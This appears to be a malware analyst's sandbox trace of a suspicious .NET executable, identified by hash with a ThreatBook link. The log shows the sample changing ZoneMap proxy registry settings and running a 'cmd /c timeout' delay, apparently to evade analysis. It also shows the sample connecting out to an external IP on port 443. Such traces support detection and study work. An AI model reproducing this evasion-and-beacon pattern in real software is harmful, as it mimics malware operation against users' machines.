样本分析 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb

 

https://s.threatbook.com/report/file/99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb

 

09:07:41:671,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:0,	4092,	EXEC_create,	C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	parent_pid:7920 cmdline:'C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe' image_base:0x0000000000610000 image_size:0x0000A000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:686,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\Microsoft.NET\Framework,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:41:702,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	offset:0x00000000 datalen:0x00000FFF ,	0x00000000 [操作成功完成。  ],	
09:07:41:702,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:41:702,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll.aux,	offset:0x00000000 datalen:0x000000B0 ,	0x00000000 [操作成功完成。  ],	
09:07:41:702,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:0,	4092,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll,	base:0x0000000071D60000 size:0x0140E000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:719,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	offset:0x00000000 datalen:0x00000FFF ,	0x00000000 [操作成功完成。  ],	
09:07:41:719,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:41:719,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll.aux,	offset:0x00000000 datalen:0x0000026C ,	0x00000000 [操作成功完成。  ],	
09:07:41:719,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:0,	4092,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll,	base:0x0000000071270000 size:0x00A55000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:719,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:41:719,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll.aux,	offset:0x00000000 datalen:0x00000360 ,	0x00000000 [操作成功完成。  ],	
09:07:41:719,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:41:719,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll.aux,	offset:0x00000000 datalen:0x00000384 ,	0x00000000 [操作成功完成。  ],	
09:07:41:719,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:0,	4092,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll,	base:0x0000000070A50000 size:0x00818000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:719,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:0,	4092,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll,	base:0x0000000070940000 size:0x00106000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:719,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:41:734,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll.aux,	offset:0x00000000 datalen:0x000002EC ,	0x00000000 [操作成功完成。  ],	
09:07:41:734,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:0,	4092,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll,	base:0x000000006E430000 size:0x00774000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:734,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	offset:0x00000000 datalen:0x00000FFF ,	0x00000000 [操作成功完成。  ],	
09:07:41:734,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	offset:0x00000000 datalen:0x00001000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:749,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:41:749,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\37c31fb353175d6efd4ca9dc426cab68\System.Windows.Forms.ni.dll.aux,	offset:0x00000000 datalen:0x000006B8 ,	0x00000000 [操作成功完成。  ],	
09:07:41:749,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\59978a45568399ef08cfe99da6a725bb\System.Windows.Forms.ni.dll.aux,	offset:0x00000000 datalen:0x000006B8 ,	0x00000000 [操作成功完成。  ],	
09:07:41:749,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:41:749,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\37c31fb353175d6efd4ca9dc426cab68\System.Windows.Forms.ni.dll.aux,	offset:0x00000000 datalen:0x000006B8 ,	0x00000000 [操作成功完成。  ],	
09:07:41:749,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\59978a45568399ef08cfe99da6a725bb\System.Windows.Forms.ni.dll.aux,	offset:0x00000000 datalen:0x000006B8 ,	0x00000000 [操作成功完成。  ],	
09:07:41:796,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	FILE_read,	C:\Users\bonelee\Desktop\desktop.ini,	offset:0x00000000 datalen:0x0000011C ,	0x00000000 [操作成功完成。  ],	
09:07:41:796,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	FILE_read,	C:\Users\bonelee\Documents\desktop.ini,	offset:0x00000000 datalen:0x00000194 ,	0x00000000 [操作成功完成。  ],	
09:07:41:796,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	FILE_read,	C:\Users\bonelee\Music\desktop.ini,	offset:0x00000000 datalen:0x000001FA ,	0x00000000 [操作成功完成。  ],	
09:07:41:811,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	FILE_read,	C:\Users\bonelee\Pictures\desktop.ini,	offset:0x00000000 datalen:0x000001FA ,	0x00000000 [操作成功完成。  ],	
09:07:41:811,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	FILE_read,	C:\Users\bonelee\Videos\desktop.ini,	offset:0x00000000 datalen:0x000001FA ,	0x00000000 [操作成功完成。  ],	
09:07:41:811,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	FILE_read,	C:\Users\bonelee\Downloads\desktop.ini,	offset:0x00000000 datalen:0x0000011C ,	0x00000000 [操作成功完成。  ],	
09:07:41:811,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	FILE_read,	C:\Users\bonelee\OneDrive\desktop.ini,	offset:0x00000000 datalen:0x00000064 ,	0x00000000 [操作成功完成。  ],	
09:07:41:827,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:07:41:827,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:07:41:827,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:07:41:827,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:07:41:827,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:07:41:827,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:07:41:827,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:07:41:827,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:8504,	4092,	FILE_read,	C:\Windows\SysWOW64\cmd.exe,	offset:0x00000000 datalen:0x00039A00 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:0,	4092,	PROC_exec,	C:\Windows\SysWOW64\cmd.exe,	target_pid:6308 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	cmd.exe,	6308:0,	4092,	EXEC_create,	C:\Windows\SysWOW64\cmd.exe,	parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' image_base:0x0000000000FE0000 image_size:0x00059000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	cmd.exe,	6308:5100,	4092,	FILE_read,	C:\Windows\System32\conhost.exe,	offset:0x00000000 datalen:0x000C8C00 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	cmd.exe,	6308:0,	4092,	PROC_exec,	C:\Windows\System32\conhost.exe,	target_pid:6580 cmdline:'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1' ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	cmd.exe,	6308:5100,	4092,	REG_setval,	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-2451103786-187343032-3810694054-1000\\Device\HarddiskVolume3\Windows\System32\conhost.exe,	type:0x00000003 datalen:24 data:'C9 2F 5F 60 DE DA D9 01 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:0,	4092,	EXEC_create,	C:\Windows\System32\conhost.exe,	parent_pid:6308 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' image_base:0x00007FF6131A0000 image_size:0x000D1000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:5780,	4092,	FILE_read,	C:\Windows\Prefetch\CONHOST.EXE-0C6456FB.pf,	offset:0x00000000 datalen:0x00001E40 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\ntdll.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\conhost.exe,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\kernel32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\KernelBase.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\locale.nls,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\msvcp_win.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\ucrtbase.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\SHCore.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\msvcrt.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\rpcrt4.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\combase.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\bcryptprimitives.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\advapi32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\sechost.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\user32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\win32u.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\gdi32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\gdi32full.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\imm32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\Conhost.exe.mui,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\shell32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\cfgmgr32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\windows.storage.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\profapi.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\powrprof.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\shlwapi.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\kernel.appcore.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\cryptsp.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:858,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\Globalization\Sorting\SortDefault.nls,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:874,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\user32.dll.mui,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:874,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\msctf.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:874,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\oleaut32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:874,	conhost.exe,	6580:232,	4092,	FILE_chmod,	C:\Windows\System32\ole32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:921,	conhost.exe,	6580:7656,	4092,	FILE_read,	C:\Windows\Fonts\StaticCache.dat,	offset:0x00000000 datalen:0x0000003C ,	0x00000000 [操作成功完成。  ],	
09:07:41:936,	conhost.exe,	6580:0,	4092,	EXEC_module_load,	C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_05b6437c071e554b\comctl32.dll,	base:0x00007FFA14440000 size:0x00279000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:936,	cmd.exe,	6308:5100,	4092,	FILE_read,	C:\Windows\SysWOW64\timeout.exe,	offset:0x00000000 datalen:0x00006200 ,	0x00000000 [操作成功完成。  ],	
09:07:41:936,	cmd.exe,	6308:0,	4092,	PROC_exec,	C:\Windows\SysWOW64\timeout.exe,	target_pid:8672 cmdline:'timeout  4.769' ,	0x00000000 [操作成功完成。  ],	
09:07:41:952,	timeout.exe,	8672:0,	4092,	EXEC_create,	C:\Windows\SysWOW64\timeout.exe,	parent_pid:6308 cmdline:'timeout  4.769' image_base:0x0000000000020000 image_size:0x0000A000 ,	0x00000000 [操作成功完成。  ],	
09:07:41:968,	timeout.exe,	8672:0,	4092,	EXEC_destroy,	C:\Windows\SysWOW64\timeout.exe,	parent_pid:6308 cmdline:'timeout  4.769' ,	0x00000000 [操作成功完成。  ],	
09:07:41:968,	cmd.exe,	6308:0,	4092,	EXEC_destroy,	C:\Windows\SysWOW64\cmd.exe,	parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' ,	0x00000000 [操作成功完成。  ],	
09:07:41:968,	conhost.exe,	6580:0,	4092,	EXEC_destroy,	C:\Windows\System32\conhost.exe,	parent_pid:6308 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' ,	0x00000000 [操作成功完成。  ],	
09:07:41:968,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:41:968,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\167c4b04ac34ab24a58f841c21862a3e\System.Drawing.ni.dll.aux,	offset:0x00000000 datalen:0x00000248 ,	0x00000000 [操作成功完成。  ],	
09:07:41:968,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\67e34187cff6cf0d7e49a0b354229d26\System.Drawing.ni.dll.aux,	offset:0x00000000 datalen:0x00000248 ,	0x00000000 [操作成功完成。  ],	
09:07:41:968,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:41:968,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\167c4b04ac34ab24a58f841c21862a3e\System.Drawing.ni.dll.aux,	offset:0x00000000 datalen:0x00000248 ,	0x00000000 [操作成功完成。  ],	
09:07:41:968,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\67e34187cff6cf0d7e49a0b354229d26\System.Drawing.ni.dll.aux,	offset:0x00000000 datalen:0x00000248 ,	0x00000000 [操作成功完成。  ],	
09:07:42:046,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:0,	4092,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll,	base:0x000000006FF10000 size:0x0008E000 ,	0x00000000 [操作成功完成。  ],	
09:07:42:061,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:42:061,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\bac1ef140124369de2a7efb857ab6349\Accessibility.ni.dll.aux,	offset:0x00000000 datalen:0x0000012C ,	0x00000000 [操作成功完成。  ],	
09:07:42:061,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\e3c0ae9a32f7a39d7afc41a8aa847174\Accessibility.ni.dll.aux,	offset:0x00000000 datalen:0x0000012C ,	0x00000000 [操作成功完成。  ],	
09:07:42:061,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:07:42:061,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\bac1ef140124369de2a7efb857ab6349\Accessibility.ni.dll.aux,	offset:0x00000000 datalen:0x0000012C ,	0x00000000 [操作成功完成。  ],	
09:07:42:061,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\e3c0ae9a32f7a39d7afc41a8aa847174\Accessibility.ni.dll.aux,	offset:0x00000000 datalen:0x0000012C ,	0x00000000 [操作成功完成。  ],	
09:07:42:608,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	NET_connect,	104.18.19.73:443,	protocol:(TCP)0 ,	0x00000000 [操作成功完成。  ],	
09:07:43:641,	99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe,	4092:3128,	4092,	NET_connect,	104.18.18.73:443,	protocol:(TCP)0 ,	0x00000000 [操作成功完成。  ],	
